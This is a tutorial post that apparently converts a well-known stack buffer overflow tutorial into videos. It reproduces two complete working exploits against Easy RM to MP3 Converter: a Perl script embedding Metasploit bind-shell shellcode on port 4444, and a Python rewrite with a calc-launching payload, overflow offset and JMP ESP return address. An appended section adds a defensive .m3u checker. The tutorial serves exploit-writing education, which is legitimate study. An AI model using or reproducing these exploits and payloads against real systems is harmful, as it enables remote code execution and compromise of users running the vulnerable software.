I followed the Corelan tutorials for BOF exploitation (which are awesome), so I will convert them into videos, and I will use Python instead of Perl.

The first tutorial is about a vulnerability in Easy RM to MP3 Conversion Utility, which was reported by Crazy_Hacker with a POC (SP2 ENG) that doesn't work for me.

corelanc0d3r rewrote the exploit to work under SP3:

#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK :-)
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";

my $junk= "A" x 26094;
my $eip = pack('V',0x01ccf23a);  #jmp esp from MSRMCcodec02.dll

my $shellcode = "\x90" x 25;

# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

I tried the exploit under SP2 (ENG) and found it doesn't work, so I wrote the exploit in Python:

#!/usr/bin/env python
#
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Vulnerability discovered by Crazy_Hacker who reported with a POC
# The poc was for SP2 (it doesn't work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt
# Corelanc0d3r wrote the sploit again but to work under SP3
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
#

import sys

m3uf = sys.argv[1]

# byte strings throughout, so the file contents are the same under Python 2 and 3
buff = b'A' * 26072
buff += b'\x3a\xf2\xa8\x01' # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)
buff += b'CCCC' # 4 bytes of garbage
buff += b'\x90' * 25 # 25 bytes of nop sled

# sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b '\x00\x09\x0a' -t c
buff += (b"\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
b"\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5"
b"\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1"
b"\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1"
b"\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77"
b"\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78"
b"\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee"
b"\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f"
b"\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01"
b"\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58"
b"\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62"
b"\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f"
b"\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf"
b"\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f"
b"\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd")

f = open(m3uf, 'wb') # binary mode so the bytes are written unchanged
f.write(buff)
f.close()
print('\n[+] File written successfully in %s\n' % m3uf)
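As an added example, not part of the original post or of the exploit above, here is a small Python 3 checker that an analyst could run over an .m3u file to flag the signs of this overflow: a playlist entry far longer than any legitimate path, a run of NOP bytes, and the 4 bytes at the overwrite offset used above, decoded the way the CPU would read them into EIP. The length threshold, the sample playlist and the INT3 bytes standing in for a payload are constructed assumptions; the offset 26072 and the address 0x01A8F23A are the ones cited in the exploit above.

```python
#!/usr/bin/env python3
# Added example: a small analyzer for .m3u playlists that flags the
# pattern behind this overflow. Not part of the original post.
import struct

# Assumptions (not from the original post): no real playlist entry is
# anywhere near this long; the EIP offset is the one used in the exploit above.
MAX_SANE_ENTRY = 4096
EIP_OFFSET = 26072        # offset of the return-address overwrite in the Python exploit above
MIN_NOP_SLED = 8          # shortest run of 0x90 bytes worth reporting


def longest_nop_run(data):
    """Return the length of the longest run of 0x90 (NOP) bytes in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def analyze_entry(entry):
    """Inspect one playlist entry (bytes, no trailing newline)."""
    finding = {
        "length": len(entry),
        "oversized": len(entry) > MAX_SANE_ENTRY,
        "nop_sled": longest_nop_run(entry) >= MIN_NOP_SLED,
        "non_printable": sum(1 for b in entry if b < 0x20 or b > 0x7e),
        "eip_overwrite": None,
    }
    if len(entry) >= EIP_OFFSET + 4:
        # the 4 bytes at the overwrite offset as a little-endian address,
        # i.e. the value that would be popped into EIP
        finding["eip_overwrite"] = struct.unpack("<I", entry[EIP_OFFSET:EIP_OFFSET + 4])[0]
    return finding


def analyze_m3u(data):
    """Split raw .m3u bytes into entries and return findings for the suspicious ones."""
    results = []
    # bytes.splitlines only breaks on \n, \r and \r\n, so payload bytes stay intact
    for lineno, line in enumerate(data.splitlines(), 1):
        if not line or line.startswith(b"#"):
            continue   # blank lines and #EXTM3U / #EXTINF directives
        f = analyze_entry(line)
        if f["oversized"] or f["nop_sled"] or f["non_printable"]:
            f["line"] = lineno
            results.append(f)
    return results


# Constructed sample (not the exploit payload above): a benign playlist entry
# followed by one entry with the same layout as the Python exploit, but with
# INT3 bytes (0xcc) where real shellcode would go.
BENIGN = b"#EXTM3U\nC:\\Music\\track01.mp3\n"
SUSPICIOUS = (
    b"A" * EIP_OFFSET
    + struct.pack("<I", 0x01A8F23A)   # the JMP ESP address cited above
    + b"CCCC"
    + b"\x90" * 25
    + b"\xcc" * 32
    + b"\n"
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else BENIGN + SUSPICIOUS
    for f in analyze_m3u(blob):
        addr = f["eip_overwrite"]
        print("line %d: %d bytes, nop sled=%s, non-printable=%d, EIP overwrite=%s"
              % (f["line"], f["length"], f["nop_sled"], f["non_printable"],
                 "0x%08x" % addr if addr is not None else "n/a"))
```

Run it with a path to a playlist, or with no argument to see the constructed sample flagged. The checker reads the file in binary mode on purpose: an entry like the one above is not valid text, and decoding it first would either fail or hide the payload bytes the analysis is looking for.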

Check out the video:

Script I used in the tutorial:
m3u.py download
The exploit in Python:
Easy_RM_to_MP3-exp.py download
